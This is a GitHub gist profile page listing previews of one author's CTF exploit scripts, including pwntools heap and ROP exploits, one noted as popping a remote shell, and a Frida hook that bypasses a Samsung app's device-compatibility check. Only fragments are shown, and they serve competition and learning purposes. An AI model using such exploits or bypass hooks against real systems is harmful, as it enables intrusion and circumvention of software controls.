Skip to content

Instantly share code, notes, and snippets.

Avatar

alberto__segura segura2010

View GitHub Profile
@segura2010
segura2010 / exploit.py
Created Apr 17, 2020
Prison Heap Hard challenge - c0r0n4con CTF
View exploit.py
from pwn import *
def create(size, content=None):
s.send("1\n")
s.recvuntil("Choose the size of prison heap")
s.send("{}\n".format(size))
s.recvuntil("Enter the name of the person who is going to enter the prison")
#sleep(0.5)
s.send("{}\n".format(content))
View exploit.py
import threading
from pwn import *
from socket import *
import struct
from telnetlib import Telnet
class ChatClient:
def __init__(self, server):
View exploit.py
from pwn import *
IP = 'localhost'
PORT = 54321
s = None
def send_msg(msg, size):
s = remote(IP, PORT)
COOKIE = "Eko2019\x00"
s.send(COOKIE + pack(size, 64, 'little', True))
@segura2010
segura2010 / pokedex_nn8ed.py
Last active Oct 8, 2018
Solution for the Pokedex challenge NN8ed CTF
View pokedex_nn8ed.py
# coding=utf-8
# Writeup: https://elladodelnovato.blogspot.com/2018/10/ctf-nn8ed-navaja-negra-pokedex.html
from pwn import *
env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.27.so")}
s = process("./pokedex_nn2k18", env=env)
#s = remote('challenges.ka0labs.org', 1341)
@segura2010
segura2010 / TUCTF2017_Temple_PWN.py
Last active Nov 27, 2017
My Solution for the temple challenge of the TUCTF 2017 (https://tuctf.asciioverflow.com/)
View TUCTF2017_Temple_PWN.py
# -*- coding: utf-8 -*-
'''
TUCTF 2017 - https://tuctf.asciioverflow.com/
temple (500 points) - PWN
--------------------------------------------------------
(Small)Explanation at the end of the file.
--------------------------------------------------------
'''
View ROPEmporium_Pivot.py
'''
Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html)
It pops a remote shell.
Run the binary with: nc -lvc ./pivot -p 4444
Then, run this exploit :)
'''
@segura2010
segura2010 / hack1t_pwn200.py
Last active Aug 28, 2017
Solution to pwn200 task of hack1t 2017 CTF :) (I wanted to practice ROP, so I did it opening and reading the flag file to finally write it to stdout and exit)
View hack1t_pwn200.py
import socket
from struct import pack
def p(x):
return pack('<L', x)
s = socket.socket(
socket.AF_INET, socket.SOCK_STREAM)
s.connect(("165.227.98.55", 3333))
@segura2010
segura2010 / frida_samsung_manager
Created Sep 12, 2016
Frida script to force compatibility of Samsung Manager app in Android
View frida_samsung_manager
Java.perform(function () {
// Function to hook is defined here
var HostManagerUtils = Java.use('com.samsung.android.app.twatchmanager.util.HostManagerUtils');
HostManagerUtils.isSupportedInHostDevice.implementation = function (p1) {
var result = this.isSupportedInHostDevice(p1);
console.log("isSupportedInHostDevice return: " + result);
You can’t perform that action at this time.